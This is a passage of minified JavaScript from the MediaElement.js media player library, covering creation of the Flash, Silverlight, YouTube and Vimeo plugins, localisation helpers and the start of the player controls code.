this.hasAttribute(a)?this.attributes[a]:""},setAttribute:function(a,b){this.attributes[a]=b},remove:function(){mejs.Utility.removeSwf(this.pluginElement.id),mejs.MediaPluginBridge.unregisterPluginElement(this.pluginElement.id)}},mejs.MediaElementDefaults={mode:"auto",plugins:["flash","silverlight","youtube","vimeo"],enablePluginDebug:!1,httpsBasicAuthSite:!1,type:"",pluginPath:mejs.Utility.getScriptPath(["mediaelement.js","mediaelement.min.js","mediaelement-and-player.js","mediaelement-and-player.min.js"]),flashName:"flashmediaelement.swf",flashStreamer:"",flashScriptAccess:"sameDomain",enablePluginSmoothing:!1,enablePseudoStreaming:!1,pseudoStreamingStartQueryParam:"start",silverlightName:"silverlightmediaelement.xap",defaultVideoWidth:480,defaultVideoHeight:270,pluginWidth:-1,pluginHeight:-1,pluginVars:[],timerRate:250,startVolume:.8,success:function(){},error:function(){}},mejs.MediaElement=function(a,b){return mejs.HtmlMediaElementShim.create(a,b)},mejs.HtmlMediaElementShim={create:function(a,b){var c,d,e={},f="string"==typeof a?document.getElementById(a):a,g=f.tagName.toLowerCase(),h="audio"===g||"video"===g,i=h?f.getAttribute("src"):f.getAttribute("href"),j=f.getAttribute("poster"),k=f.getAttribute("autoplay"),l=f.getAttribute("preload"),m=f.getAttribute("controls");for(d in mejs.MediaElementDefaults)e[d]=mejs.MediaElementDefaults[d];for(d in b)e[d]=b[d];return i="undefined"==typeof i||null===i||""==i?null:i,j="undefined"==typeof j||null===j?"":j,l="undefined"==typeof l||null===l||"false"===l?"none":l,k=!("undefined"==typeof k||null===k||"false"===k),m=!("undefined"==typeof m||null===m||"false"===m),c=this.determinePlayback(f,e,mejs.MediaFeatures.supportsMediaTag,h,i),c.url=null!==c.url?mejs.Utility.absolutizeUrl(c.url):"",c.scheme=mejs.Utility.determineScheme(c.url),"native"==c.method?(mejs.MediaFeatures.isBustedAndroid&&(f.src=c.url,f.addEventListener("click",function(){f.play()},!1)),this.updateNative(c,e,k,l)):""!==c.method?this.createPlugin(c,e,j,k,l,m):(this.createErrorMessage(c,e,j),this)},determinePlayback:function(a,b,c,d,e){var f,g,h,i,j,k,l,m,n,o,p,q=[],r={method:"",url:"",htmlMediaElement:a,isVideo:"audio"!=a.tagName.toLowerCase(),scheme:""};if("undefined"!=typeof b.type&&""!==b.type)if("string"==typeof b.type)q.push({type:b.type,url:e});else for(f=0;f<b.type.length;f++)q.push({type:b.type[f],url:e});else if(null!==e)k=this.formatType(e,a.getAttribute("type")),q.push({type:k,url:e});else for(f=0;f<a.childNodes.length;f++)j=a.childNodes[f],1==j.nodeType&&"source"==j.tagName.toLowerCase()&&(e=j.getAttribute("src"),k=this.formatType(e,j.getAttribute("type")),p=j.getAttribute("media"),(!p||!window.matchMedia||window.matchMedia&&window.matchMedia(p).matches)&&q.push({type:k,url:e}));if(!d&&q.length>0&&null!==q[0].url&&this.getTypeFromFile(q[0].url).indexOf("audio")>-1&&(r.isVideo=!1),mejs.MediaFeatures.isBustedAndroid&&(a.canPlayType=function(a){return null!==a.match(/video\/(mp4|m4v)/gi)?"maybe":""}),mejs.MediaFeatures.isChromium&&(a.canPlayType=function(a){return null!==a.match(/video\/(webm|ogv|ogg)/gi)?"maybe":""}),c&&("auto"===b.mode||"auto_plugin"===b.mode||"native"===b.mode)&&(!mejs.MediaFeatures.isBustedNativeHTTPS||b.httpsBasicAuthSite!==!0)){for(d||(o=document.createElement(r.isVideo?"video":"audio"),a.parentNode.insertBefore(o,a),a.style.display="none",r.htmlMediaElement=a=o),f=0;f<q.length;f++)if("video/m3u8"==q[f].type||""!==a.canPlayType(q[f].type).replace(/no/,"")||""!==a.canPlayType(q[f].type.replace(/mp3/,"mpeg")).replace(/no/,"")||""!==a.canPlayType(q[f].type.replace(/m4a/,"mp4")).replace(/no/,"")){r.method="native",r.url=q[f].url;break}if("native"===r.method&&(null!==r.url&&(a.src=r.url),"auto_plugin"!==b.mode))return r}if("auto"===b.mode||"auto_plugin"===b.mode||"shim"===b.mode)for(f=0;f<q.length;f++)for(k=q[f].type,g=0;g<b.plugins.length;g++)for(l=b.plugins[g],m=mejs.plugins[l],h=0;h<m.length;h++)if(n=m[h],null==n.version||mejs.PluginDetector.hasPluginVersion(l,n.version))for(i=0;i<n.types.length;i++)if(k.toLowerCase()==n.types[i].toLowerCase())return r.method=l,r.url=q[f].url,r;return"auto_plugin"===b.mode&&"native"===r.method?r:(""===r.method&&q.length>0&&(r.url=q[0].url),r)},formatType:function(a,b){return a&&!b?this.getTypeFromFile(a):b&&~b.indexOf(";")?b.substr(0,b.indexOf(";")):b},getTypeFromFile:function(a){a=a.split("?")[0];var b=a.substring(a.lastIndexOf(".")+1).toLowerCase(),c=/(mp4|m4v|ogg|ogv|m3u8|webm|webmv|flv|wmv|mpeg|mov)/gi.test(b)?"video/":"audio/";return this.getTypeFromExtension(b,c)},getTypeFromExtension:function(a,b){switch(b=b||"",a){case"mp4":case"m4v":case"m4a":case"f4v":case"f4a":return b+"mp4";case"flv":return b+"x-flv";case"webm":case"webma":case"webmv":return b+"webm";case"ogg":case"oga":case"ogv":return b+"ogg";case"m3u8":return"application/x-mpegurl";case"ts":return b+"mp2t";default:return b+a}},createErrorMessage:function(a,b,c){var d=a.htmlMediaElement,e=document.createElement("div"),f=b.customError;e.className="me-cannotplay";try{e.style.width=d.width+"px",e.style.height=d.height+"px"}catch(g){}f||(f='<a href="'+a.url+'">',""!==c&&(f+='<img src="'+c+'" width="100%" height="100%" alt="" />'),f+="<span>"+mejs.i18n.t("Download File")+"</span></a>"),e.innerHTML=f,d.parentNode.insertBefore(e,d),d.style.display="none",b.error(d)},createPlugin:function(a,b,c,d,e,f){var g,h,i,j=a.htmlMediaElement,k=1,l=1,m="me_"+a.method+"_"+mejs.meIndex++,n=new mejs.PluginMediaElement(m,a.method,a.url),o=document.createElement("div");n.tagName=j.tagName;for(var p=0;p<j.attributes.length;p++){var q=j.attributes[p];q.specified&&n.setAttribute(q.name,q.value)}for(h=j.parentNode;null!==h&&null!=h.tagName&&"body"!==h.tagName.toLowerCase()&&null!=h.parentNode&&null!=h.parentNode.tagName&&null!=h.parentNode.constructor&&"ShadowRoot"===h.parentNode.constructor.name;){if("p"===h.parentNode.tagName.toLowerCase()){h.parentNode.parentNode.insertBefore(h,h.parentNode);break}h=h.parentNode}switch(a.isVideo?(k=b.pluginWidth>0?b.pluginWidth:b.videoWidth>0?b.videoWidth:null!==j.getAttribute("width")?j.getAttribute("width"):b.defaultVideoWidth,l=b.pluginHeight>0?b.pluginHeight:b.videoHeight>0?b.videoHeight:null!==j.getAttribute("height")?j.getAttribute("height"):b.defaultVideoHeight,k=mejs.Utility.encodeUrl(k),l=mejs.Utility.encodeUrl(l)):b.enablePluginDebug&&(k=320,l=240),n.success=b.success,o.className="me-plugin",o.id=m+"_container",a.isVideo?j.parentNode.insertBefore(o,j):document.body.insertBefore(o,document.body.childNodes[0]),("flash"===a.method||"silverlight"===a.method)&&(i=["id="+m,"isvideo="+(a.isVideo?"true":"false"),"autoplay="+(d?"true":"false"),"preload="+e,"width="+k,"startvolume="+b.startVolume,"timerrate="+b.timerRate,"flashstreamer="+b.flashStreamer,"height="+l,"pseudostreamstart="+b.pseudoStreamingStartQueryParam],null!==a.url&&("flash"==a.method?i.push("file="+mejs.Utility.encodeUrl(a.url)):i.push("file="+a.url)),b.enablePluginDebug&&i.push("debug=true"),b.enablePluginSmoothing&&i.push("smoothing=true"),b.enablePseudoStreaming&&i.push("pseudostreaming=true"),f&&i.push("controls=true"),b.pluginVars&&(i=i.concat(b.pluginVars)),window[m+"_init"]=function(){switch(n.pluginType){case"flash":n.pluginElement=n.pluginApi=document.getElementById(m);break;case"silverlight":n.pluginElement=document.getElementById(n.id),n.pluginApi=n.pluginElement.Content.MediaElementJS}null!=n.pluginApi&&n.success&&n.success(n,j)},window[m+"_event"]=function(a,b){var c,d,e;c={type:a,target:n};for(d in b)n[d]=b[d],c[d]=b[d];e=b.bufferedTime||0,c.target.buffered=c.buffered={start:function(a){return 0},end:function(a){return e},length:1},n.dispatchEvent(c)}),a.method){case"silverlight":o.innerHTML='<object data="data:application/x-silverlight-2," type="application/x-silverlight-2" id="'+m+'" name="'+m+'" width="'+k+'" height="'+l+'" class="mejs-shim"><param name="initParams" value="'+i.join(",")+'" /><param name="windowless" value="true" /><param name="background" value="black" /><param name="minRuntimeVersion" value="3.0.0.0" /><param name="autoUpgrade" value="true" /><param name="source" value="'+b.pluginPath+b.silverlightName+'" /></object>';break;case"flash":mejs.MediaFeatures.isIE?(g=document.createElement("div"),o.appendChild(g),g.outerHTML='<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="//download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" id="'+m+'" width="'+k+'" height="'+l+'" class="mejs-shim"><param name="movie" value="'+b.pluginPath+b.flashName+"?"+(new Date).getTime()+'" /><param name="flashvars" value="'+i.join("&amp;")+'" /><param name="quality" value="high" /><param name="bgcolor" value="#000000" /><param name="wmode" value="transparent" /><param name="allowScriptAccess" value="'+b.flashScriptAccess+'" /><param name="allowFullScreen" value="true" /><param name="scale" value="default" /></object>'):o.innerHTML='<embed id="'+m+'" name="'+m+'" play="true" loop="false" quality="high" bgcolor="#000000" wmode="transparent" allowScriptAccess="'+b.flashScriptAccess+'" allowFullScreen="true" type="application/x-shockwave-flash" pluginspage="//www.macromedia.com/go/getflashplayer" src="'+b.pluginPath+b.flashName+'" flashvars="'+i.join("&")+'" width="'+k+'" height="'+l+'" scale="default"class="mejs-shim"></embed>';break;case"youtube":var r;-1!=a.url.lastIndexOf("youtu.be")?(r=a.url.substr(a.url.lastIndexOf("/")+1),-1!=r.indexOf("?")&&(r=r.substr(0,r.indexOf("?")))):r=a.url.substr(a.url.lastIndexOf("=")+1),youtubeSettings={container:o,containerId:o.id,pluginMediaElement:n,pluginId:m,videoId:r,height:l,width:k,scheme:a.scheme},window.postMessage?mejs.YouTubeApi.enqueueIframe(youtubeSettings):mejs.PluginDetector.hasPluginVersion("flash",[10,0,0])&&mejs.YouTubeApi.createFlash(youtubeSettings,b);break;case"vimeo":var s=m+"_player";if(n.vimeoid=a.url.substr(a.url.lastIndexOf("/")+1),o.innerHTML='<iframe tabindex="-1" src="'+a.scheme+"player.vimeo.com/video/"+n.vimeoid+"?api=1&portrait=0&byline=0&title=0&player_id="+s+'" width="'+k+'" height="'+l+'" frameborder="0" class="mejs-shim" id="'+s+'" webkitallowfullscreen mozallowfullscreen allowfullscreen></iframe>',"function"==typeof $f){var t=$f(o.childNodes[0]),u=-1;t.addEvent("ready",function(){function a(a,b,c,d){var e={type:c,target:b};"timeupdate"==c&&(b.currentTime=e.currentTime=d.seconds,b.duration=e.duration=d.duration),b.dispatchEvent(e)}t.playVideo=function(){t.api("play")},t.stopVideo=function(){t.api("unload")},t.pauseVideo=function(){t.api("pause")},t.seekTo=function(a){t.api("seekTo",a)},t.setVolume=function(a){t.api("setVolume",a)},t.setMuted=function(a){a?(t.lastVolume=t.api("getVolume"),t.api("setVolume",0)):(t.api("setVolume",t.lastVolume),delete t.lastVolume)},t.getPlayerState=function(){return u},t.addEvent("play",function(){u=1,a(t,n,"play"),a(t,n,"playing")}),t.addEvent("pause",function(){u=2,a(t,n,"pause")}),t.addEvent("finish",function(){u=0,a(t,n,"ended")}),t.addEvent("playProgress",function(b){a(t,n,"timeupdate",b)}),t.addEvent("seek",function(b){u=3,a(t,n,"seeked",b)}),t.addEvent("loadProgress",function(b){u=3,a(t,n,"progress",b)}),n.pluginElement=o,n.pluginApi=t,n.success(n,n.pluginElement)})}else console.warn("You need to include froogaloop for vimeo to work")}return j.style.display="none",j.removeAttribute("autoplay"),n},updateNative:function(a,b,c,d){var e,f=a.htmlMediaElement;for(e in mejs.HtmlMediaElement)f[e]=mejs.HtmlMediaElement[e];return b.success(f,f),f}},mejs.YouTubeApi={isIframeStarted:!1,isIframeLoaded:!1,loadIframeApi:function(a){if(!this.isIframeStarted){var b=document.createElement("script");b.src=a.scheme+"www.youtube.com/player_api";var c=document.getElementsByTagName("script")[0];c.parentNode.insertBefore(b,c),this.isIframeStarted=!0}},iframeQueue:[],enqueueIframe:function(a){this.isLoaded?this.createIframe(a):(this.loadIframeApi(a),this.iframeQueue.push(a))},createIframe:function(a){var b=a.pluginMediaElement,c=new YT.Player(a.containerId,{height:a.height,width:a.width,videoId:a.videoId,playerVars:{controls:0,wmode:"transparent"},events:{onReady:function(){c.setVideoSize=function(a,b){c.setSize(a,b)},a.pluginMediaElement.pluginApi=c,a.pluginMediaElement.pluginElement=document.getElementById(a.containerId),b.success(b,b.pluginElement),setInterval(function(){mejs.YouTubeApi.createEvent(c,b,"timeupdate")},250)},onStateChange:function(a){mejs.YouTubeApi.handleStateChange(a.data,c,b)}}})},createEvent:function(a,b,c){var d={type:c,target:b};if(a&&a.getDuration){b.currentTime=d.currentTime=a.getCurrentTime(),b.duration=d.duration=a.getDuration(),d.paused=b.paused,d.ended=b.ended,d.muted=a.isMuted(),d.volume=a.getVolume()/100,d.bytesTotal=a.getVideoBytesTotal(),d.bufferedBytes=a.getVideoBytesLoaded();var e=d.bufferedBytes/d.bytesTotal*d.duration;d.target.buffered=d.buffered={start:function(a){return 0},end:function(a){return e},length:1}}b.dispatchEvent(d)},iFrameReady:function(){for(this.isLoaded=!0,this.isIframeLoaded=!0;this.iframeQueue.length>0;){var a=this.iframeQueue.pop();this.createIframe(a)}},flashPlayers:{},createFlash:function(a){this.flashPlayers[a.pluginId]=a;var b,c=a.scheme+"www.youtube.com/apiplayer?enablejsapi=1&amp;playerapiid="+a.pluginId+"&amp;version=3&amp;autoplay=0&amp;controls=0&amp;modestbranding=1&loop=0&disablekb=1";mejs.MediaFeatures.isIE?(b=document.createElement("div"),a.container.appendChild(b),b.outerHTML='<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="'+a.scheme+'download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" id="'+a.pluginId+'" width="'+a.width+'" height="'+a.height+'" class="mejs-shim"><param name="movie" value="'+c+'" /><param name="wmode" value="transparent" /><param name="allowScriptAccess" value="'+options.flashScriptAccess+'" /><param name="allowFullScreen" value="true" /></object>'):a.container.innerHTML='<object type="application/x-shockwave-flash" id="'+a.pluginId+'" data="'+c+'" width="'+a.width+'" height="'+a.height+'" style="visibility: visible; " class="mejs-shim"><param name="allowScriptAccess" value="'+options.flashScriptAccess+'"><param name="wmode" value="transparent"></object>'},flashReady:function(a){var b=this.flashPlayers[a],c=document.getElementById(a),d=b.pluginMediaElement;d.pluginApi=d.pluginElement=c,b.success(d,d.pluginElement),c.cueVideoById(b.videoId);var e=b.containerId+"_callback";window[e]=function(a){mejs.YouTubeApi.handleStateChange(a,c,d)},c.addEventListener("onStateChange",e),setInterval(function(){mejs.YouTubeApi.createEvent(c,d,"timeupdate")},250),mejs.YouTubeApi.createEvent(c,d,"canplay")},handleStateChange:function(a,b,c){switch(a){case-1:c.paused=!0,c.ended=!0,mejs.YouTubeApi.createEvent(b,c,"loadedmetadata");break;case 0:c.paused=!1,c.ended=!0,mejs.YouTubeApi.createEvent(b,c,"ended");break;case 1:c.paused=!1,c.ended=!1,mejs.YouTubeApi.createEvent(b,c,"play"),mejs.YouTubeApi.createEvent(b,c,"playing");break;case 2:c.paused=!0,c.ended=!1,mejs.YouTubeApi.createEvent(b,c,"pause");break;case 3:mejs.YouTubeApi.createEvent(b,c,"progress");break;case 5:}}},window.onYouTubePlayerAPIReady=function(){mejs.YouTubeApi.iFrameReady()},window.onYouTubePlayerReady=function(a){mejs.YouTubeApi.flashReady(a)},window.mejs=mejs,window.MediaElement=mejs.MediaElement,function(a,b,c){"use strict";var d={locale:{language:b.i18n&&b.i18n.locale.language||"",strings:b.i18n&&b.i18n.locale.strings||{}},ietf_lang_regex:/^(x\-)?[a-z]{2,}(\-\w{2,})?(\-\w{2,})?$/,methods:{}};d.getLanguage=function(){var a=d.locale.language||window.navigator.userLanguage||window.navigator.language;return d.ietf_lang_regex.exec(a)?a:null},"undefined"!=typeof mejsL10n&&(d.locale.language=mejsL10n.language),d.methods.checkPlain=function(a){var b,c,d={"&":"&amp;",'"':"&quot;","<":"&lt;",">":"&gt;"};a=String(a);for(b in d)d.hasOwnProperty(b)&&(c=new RegExp(b,"g"),a=a.replace(c,d[b]));return a},d.methods.t=function(a,b){return d.locale.strings&&d.locale.strings[b.context]&&d.locale.strings[b.context][a]&&(a=d.locale.strings[b.context][a]),d.methods.checkPlain(a)},d.t=function(a,b){if("string"==typeof a&&a.length>0){var c=d.getLanguage();return b=b||{context:c},d.methods.t(a,b)}throw{name:"InvalidArgumentException",message:"First argument is either not a string or empty."}},b.i18n=d}(document,mejs),function(a,b){"use strict";"undefined"!=typeof mejsL10n&&(a[mejsL10n.language]=mejsL10n.strings)}(mejs.i18n.locale.strings), /*! * * MediaElementPlayer * http://mediaelementjs.com/ * * Creates a controller bar for HTML5 <video> add <audio> tags * using jQuery and MediaElement.js (HTML5 Flash/Silverlight wrapper) * * Copyright 2010-2013, John Dyer (http://j.hn/) * License: MIT * */ "undefined"!=typeof jQuery?mejs.$=jQuery:"undefined"!=typeof Zepto?(mejs.$=Zepto,Zepto.fn.outerWidth=function(a){var b=$(this).width();return a&&(b+=parseInt($(this).css("margin-right"),10),b+=parseInt($(this).css("margin-left"),10)),b}):"undefined"!=typeof ender&&(mejs.$=ender),function(a){mejs.MepDefaults={poster:"",showPosterWhenEnded:!1,defaultVideoWidth:480,defaultVideoHeight:270,videoWidth:-1,videoHeight:-1,defaultAudioWidth:400,defaultAudioHeight:30,defaultSeekBackwardInterval:function(a){return.05*a.duration},defaultSeekForwardInterval:function(a){return.05*a.duration},setDimensions:!0,audioWidth:-1,audioHeight:-1,startVolume:.8,loop:!1,autoRewind:!0,enableAutosize:!0,timeFormat:"",alwaysShowHours:!1,showTimecodeFrameCount:!1,framesPerSecond:25,autosizeProgress:!0,alwaysShowControls:!1,hideVideoControlsOnLoad:!1,clickToPlayPause:!0,iPadUseNativeControls:!1,iPhoneUseNativeControls:!1,AndroidUseNativeControls:!1,features:["playpause","current","progress","duration","tracks","volume","fullscreen"],isVideo:!0,enableKeyboard:!0,pauseOtherPlayers:!0,keyActions:[{keys:[32,179],action:function(a,b){b.paused||b.ended?b.play():b.pause()}},{keys:[38],action:function(a,b){a.container.find(".mejs-volume-slider").css("display","block"),a.isVideo&&(a.showControls(),a.startControlsTimer());var c=Math.min(b.volume+.1,1);b.setVolume(c)}},{keys:[40],action:function(a,b){a.container.find(".mejs-volume-slider").css("display","block"),a.isVideo&&(a.showControls(),a.startControlsTimer());var c=Math.max(b.volume-.1,0);b.setVolume(c)}},{keys:[37,227],action:function(a,b){if(!isNaN(b.duration)&&b.duration>0){a.isVideo&&(a.showControls(),a.startControlsTimer());var c=Math.max(b.currentTime-a.options.defaultSeekBackwardInterval(b),0);b.setCurrentTime(c)}}},{keys:[39,228],action:function(a,b){if(!isNaN(b.duration)&&b.duration>0){a.isVideo&&(a.showControls(),a.startControlsTimer());var c=Math.min(b.currentTime+a.options.defaultSeekForwardInterval(b),b.duration);b.setCurrentTime(c)}}},{keys:[70],action:function(a,b){"undefined"!=typeof a.enterFullScreen&&(a.isFullScreen?a.exitFullScreen():a.enterFullScreen())}},{keys:[77],action:function(a,b){a.container.find(".mejs-volume-slider").css("display","block"),a.isVideo&&(a.showControls(),a.startControlsTimer()),a.media.muted?a.setMuted(!1):a.setMuted(!0)}}]},mejs.mepIndex=0,mejs.players={},mejs.MediaElementPlayer=function(b,c){if(!(this instanceof mejs.MediaElementPlayer))return new mejs.MediaElementPlayer(b,c);var d=this;return d.$media=d.$node=a(b),d.node=d.media=d.$media[0],d.node?"undefined"!=typeof d.node.player?d.node.player:("undefined"==typeof c&&(c=d.$node.data("mejsoptions")),d.options=a.extend({},mejs.MepDefaults,c),d.options.timeFormat||(d.options.timeFormat="mm:ss",d.options.alwaysShowHours&&(d.options.timeFormat="hh:mm:ss"),d.options.showTimecodeFrameCount&&(d.options.timeFormat+=":ff")),mejs.Utility.calculateTimeFormat(0,d.options,d.options.framesPerSecond||25),d.id="mep_"+mejs.mepIndex++,mejs.players[d.id]=d,d.init(),d):void 0},mejs.MediaElementPlayer.prototype={hasFocus:!1,controlsAreVisible:!0,init:function(){var b=this,c=mejs.MediaFeatures,d=a.extend(!0,{},b.options,{success:function(a,c){b.meReady(a,c)},error:function(a){b.handleError(a)}}),e=b.media.tagName.toLowerCase();if(b.isDynamic="audio"!==e&&"video"!==e,b.isDynamic?b.isVideo=b.options.isVideo:b.isVideo="audio"!==e&&b.options.isVideo,c.isiPad&&b.options.iPadUseNativeControls||c.isiPhone&&b.options.iPhoneUseNativeControls)b.$media.attr("controls","controls"),c.isiPad&&null!==b.media.getAttribute("autoplay")&&b.play();else if(c.isAndroid&&b.options.AndroidUseNativeControls);else{b.$media.removeAttr("controls");var f=b.isVideo?mejs.i18n.t("Video Player"):mejs.i18n.t("Audio Player");a('<span class="mejs-offscreen">'+f+"</span>").insertBefore(b.$media),b.container=a('<div id="'+b.id+'" class="mejs-container '+(mejs.MediaFeatures.svgAsImg?"svg":"no-svg")+'" tabindex="0" role="application" aria-label="'+f+'"><div class="mejs-inner"><div class="mejs-mediaelement"></div><div class="mejs-layers"></div><div class="mejs-controls"></div><div class="mejs-clear"></div></div></div>').addClass(b.$media[0].className).insertBefore(b.$media).focus(function(a){if(!b.controlsAreVisible){b.showControls(!0);var c=b.container.find(".mejs-playpause-button > button");c.focus()}}),b.container.addClass((c.isAndroid?"mejs-android ":"")+(c.isiOS?"mejs-ios ":"")+(c.isiPad?"mejs-ipad ":"")+(c.isiPhone?"mejs-iphone ":"")+(b.isVideo?"mejs-video ":"mejs-audio ")),b.container.find(".mejs-mediaelement").append(b.$media),b.node.player=b,b.controls=b.container.find(".mejs-controls"),b.layers=b.container.find(".mejs-layers");var g=b.isVideo?"video":"audio",h=g.substring(0,1).toUpperCase()+g.substring(1);b.options[g+"Width"]>0||b.options[g+"Width"].toString().indexOf("%")>-1?b.width=b.options[g+"Width"]:""!==b.media.style.width&&null!==b.media.style.width?b.width=b.media.style.width:null!==b.media.getAttribute("width")?b.width=b.$media.attr("width"):b.width=b.options["default"+h+"Width"],b.options[g+"Height"]>0||b.options[g+"Height"].toString().indexOf("%")>-1?b.height=b.options[g+"Height"]:""!==b.media.style.height&&null!==b.media.style.height?b.height=b.media.style.height:null!==b.$media[0].getAttribute("height")?b.height=b.$media.attr("height"):b.height=b.options["default"+h+"Height"],b.setPlayerSize(b.width,b.height),d.pluginWidth=b.width,d.pluginHeight=b.height}mejs.MediaElement(b.$media[0],d),"undefined"!=typeof b.container&&b.controlsAreVisible&&b.container.trigger("controlsshown")},showControls:function(a){var b=this;a="undefined"==typeof a||a,b.controlsAreVisible||(a?(b.controls.removeClass("mejs-offscreen").stop(!0,!0).fadeIn(200,function(){b.controlsAreVisible=!0,b.container.trigger("controlsshown")}),b.container.find(".mejs-control").removeClass("mejs-offscreen").stop(!0,!0).fadeIn(200,function(){b.controlsAreVisible=!0})):(b.controls.removeClass("mejs-offscreen").css("display","block"),b.container.find(".mejs-control").removeClass("mejs-offscreen").css("display","block"),b.controlsAreVisible=!0,b.container.trigger("controlsshown")),b.setControlsSize())},hideControls:function(b){var c=this;b="undefined"==typeof b||b,!c.controlsAreVisible||c.options.alwaysShowControls||c.keyboardAction||(b?(c.controls.stop(!0,!0).fadeOut(200,function(){a(this).addClass("mejs-offscreen").css("display","block"),c.controlsAreVisible=!1,c.container.trigger("controlshidden")}),c.container.find(".mejs-control").stop(!0,!0).fadeOut(200,function(){a(this).addClass("mejs-offscreen").css("display","block")})):(c.controls.addClass("mejs-offscreen").css("display","block"),c.container.find(".mejs-control").addClass("mejs-offscreen").css("display","block"),c.controlsAreVisible=!1,c.container.trigger("controlshidden")))},controlsTimer:null,startControlsTimer:function(a){var b=this;a="undefined"!=typeof a?a:1500,b.killControlsTimer("start"),b.controlsTimer=setTimeout(function(){b.hideControls(),b.killControlsTimer("hide")},a)},killControlsTimer:function(a){var b=this;null!==b.controlsTimer&&(clearTimeout(b.controlsTimer),delete b.controlsTimer,b.controlsTimer=null)},controlsEnabled:!0,disableControls:function(){var a=this;a.killControlsTimer(),a.hideControls(!1),this.controlsEnabled=!1},enableControls:function(){var a=this;a.showControls(!1),a.controlsEnabled=!0},meReady:function(b,c){var d,e,f=this,g=mejs.MediaFeatures,h=c.getAttribute("autoplay"),i=!("undefined"==typeof h||null===h||"false"===h);if(!f.created){if(f.created=!0,f.media=b,f.domNode=c,!(g.isAndroid&&f.options.AndroidUseNativeControls||g.isiPad&&f.options.iPadUseNativeControls||g.isiPhone&&f.options.iPhoneUseNativeControls)){f.buildposter(f,f.controls,f.layers,f.media),f.buildkeyboard(f,f.controls,f.layers,f.media),f.buildoverlays(f,f.controls,f.layers,f.media),f.findTracks();for(d in f.options.features)if(e=f.options.features[d],f["build"+e])try{f["build"+e](f,f.controls,f.layers,f.media)}catch(j){}f.container.trigger("controlsready"),f.setPlayerSize(f.width,f.height),f.setControlsSize(),f.isVideo&&(mejs.MediaFeatures.hasTouch?f.$media.bind("touchstart",function(){f.controlsAreVisible?f.hideControls(!1):f.controlsEnabled&&f.showControls(!1)}):(f.clickToPlayPauseCallback=function(){f.options.clickToPlayPause&&(f.media.paused?f.play():f.pause())},f.media.addEventListener("click",f.clickToPlayPauseCallback,!1),f.container.bind("mouseenter",function(){f.controlsEnabled&&(f.options.alwaysShowControls||(f.killControlsTimer("enter"),f.showControls(),f.startControlsTimer(2500)))}).bind("mousemove",function(){f.controlsEnabled&&(f.controlsAreVisible||f.showControls(),f.options.alwaysShowControls||f.startControlsTimer(2500))}).bind("mouseleave",function(){f.controlsEnabled&&(f.media.paused||f.options.alwaysShowControls||f.startControlsTimer(1e3))})),f.options.hideVideoControlsOnLoad&&f.hideControls(!1),i&&!f.options.alwaysShowControls&&f.hideControls(),f.options.enableAutosize&&f.media.addEventListener("loadedmetadata",function(a){f.options.videoHeight<=0&&null===f.domNode.getAttribute("height")&&!isNaN(a.target.videoHeight)&&(f.setPlayerSize(a.target.videoWidth,a.target.videoHeight),f.setControlsSize(),f.media.setVideoSize(a.target.videoWidth,a.target.videoHeight))},!1)),b.addEventListener("play",function(){var a;for(a in mejs.players){var b=mejs.players[a];b.id==f.id||!f.options.pauseOtherPlayers||b.paused||b.ended||b.pause(),b.hasFocus=!1}f.hasFocus=!0},!1),f.media.addEventListener("ended",function(b){if(f.options.autoRewind)try{f.media.setCurrentTime(0),window.setTimeout(function(){a(f.container).find(".mejs-overlay-loading").parent().hide()},20)}catch(c){}f.media.pause(),f.setProgressRail&&f.setProgressRail(),f.setCurrentRail&&f.setCurrentRail(),f.options.loop?f.play():!f.options.alwaysShowControls&&f.controlsEnabled&&f.showControls()},!1),f.media.addEventListener("loadedmetadata",function(a){f.updateDuration&&f.updateDuration(),f.updateCurrent&&f.updateCurrent(),f.isFullScreen||(f.setPlayerSize(f.width,f.height),f.setControlsSize())},!1);var k=null;f.media.addEventListener("timeupdate",function(){k!==this.duration&&(k=this.duration,mejs.Utility.calculateTimeFormat(k,f.options,f.options.framesPerSecond||25),f.updateDuration&&f.updateDuration(),f.updateCurrent&&f.updateCurrent(),f.setControlsSize())},!1),f.container.focusout(function(b){if(b.relatedTarget){var c=a(b.relatedTarget);f.keyboardAction&&0===c.parents(".mejs-container").length&&(f.keyboardAction=!1,f.hideControls(!0))}}),setTimeout(function(){f.setPlayerSize(f.width,f.height),f.setControlsSize()},50),f.globalBind("resize",function(){f.isFullScreen||mejs.MediaFeatures.hasTrueNativeFullScreen&&document.webkitIsFullScreen||f.setPlayerSize(f.width,f.height),f.setControlsSize()}),"youtube"==f.media.pluginType&&(g.isiOS||g.isAndroid)&&(f.container.find(".mejs-overlay-play").hide(),f.container.find(".mejs-poster").hide())}i&&"native"==b.pluginType&&f.play(),f.options.success&&("string"==typeof f.options.success?window[f.options.success](f.media,f.domNode,f):f.options.success(f.media,f.domNode,f))}},handleError:function(a){var b=this;b.controls&&b.controls.hide(),b.options.error&&b.options.error(a)},setPlayerSize:function(b,c){var d=this;if(!d.options.setDimensions)return!1;if("undefined"!=typeof b&&(d.width=b),"undefined"!=typeof c&&(d.height=c),d.height.toString().indexOf("%")>0||"none"!==d.$node.css("max-width")&&"t.width"!==d.$node.css("max-width")||d.$node[0].currentStyle&&"100%"===d.$node[0].currentStyle.maxWidth){var e=function(){return d.isVideo?d.media.videoWidth&&d.media.videoWidth>0?d.media.videoWidth:null!==d.media.getAttribute("width")?d.media.getAttribute("width"):d.options.defaultVideoWidth:d.options.defaultAudioWidth}(),f=function(){return d.isVideo?d.media.videoHeight&&d.media.videoHeight>0?d.media.videoHeight:null!==d.media.getAttribute("height")?d.media.getAttribute("height"):d.options.defaultVideoHeight:d.options.defaultAudioHeight}(),g=d.container.parent().closest(":visible").width(),h=d.container.parent().closest(":visible").height(),i=d.isVideo||!d.options.autosizeProgress?parseInt(g*f/e,10):f;isNaN(i)&&(i=h),d.container.parent().length>0&&"body"===d.container.parent()[0].tagName.toLowerCase()&&(g=a(window).width(),i=a(window).height()),i&&g&&(d.container.width(g).height(i),d.$media.add(d.container.find(".mejs-shim")).width("100%").height("100%"),d.isVideo&&d.media.setVideoSize&&d.media.setVideoSize(g,i),d.layers.children(".mejs-layer").width("100%").height("100%"))}else d.container.width(d.width).height(d.height),d.layers.children(".mejs-layer").width(d.width).height(d.height)},setControlsSize:function(){var 